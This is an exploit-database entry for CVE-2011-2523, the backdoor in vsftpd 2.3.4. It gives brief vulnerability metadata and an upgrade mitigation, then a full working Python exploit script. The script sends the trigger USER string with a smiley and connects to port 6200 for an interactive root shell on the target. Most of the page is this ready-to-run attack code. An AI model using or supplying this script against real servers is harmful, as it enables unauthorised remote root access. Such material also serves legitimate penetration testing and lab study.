vsftpd 2.3.4 - Backdoor Command Execution

vendor:

vsftpd

by:

HerculesRD

9.8

CVSS

CRITICAL

Backdoor Command Execution

CWE

Product Name: vsftpd

Affected Version From: 2.3.4

Affected Version To: 2.3.4

Patch Exists: YES

Related CWE: CVE-2011-2523

CPE: 2.3.4

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Debian

2021

vsftpd 2.3.4 – Backdoor Command Execution

A vulnerability in vsftpd 2.3.4 allows an attacker to gain remote code execution by sending a specially crafted USER command to the FTP server. This can be exploited by sending a USER command with a specially crafted argument to the FTP server, which will then execute arbitrary commands with root privileges.

Mitigation:

Upgrade to the latest version of vsftpd, or apply the patch provided by the vendor.

Source

Exploit-DB raw data:

# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution
# Date: 9-04-2021
# Exploit Author: HerculesRD
# Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html
# Version: vsftpd 2.3.4
# Tested on: debian
# CVE : CVE-2011-2523

#!/usr/bin/python3   
                                                           
from telnetlib import Telnet 
import argparse
from signal import signal, SIGINT
from sys import exit

def handler(signal_received, frame):
    # Handle any cleanup here
    print('   [+]Exiting...')
    exit(0)

signal(SIGINT, handler)                           
parser=argparse.ArgumentParser()        
parser.add_argument("host", help="input the address of the vulnerable host", type=str)
args = parser.parse_args()       
host = args.host                        
portFTP = 21 #if necessary edit this line

user="USER nergal:)"
password="PASS pass"

tn=Telnet(host, portFTP)
tn.read_until(b"(vsFTPd 2.3.4)") #if necessary, edit this line
tn.write(user.encode('ascii') + b"\n")
tn.read_until(b"password.") #if necessary, edit this line
tn.write(password.encode('ascii') + b"\n")

tn2=Telnet(host, 6200)
print('Success, shell opened')
print('Send `exit` to quit shell')
tn2.interact()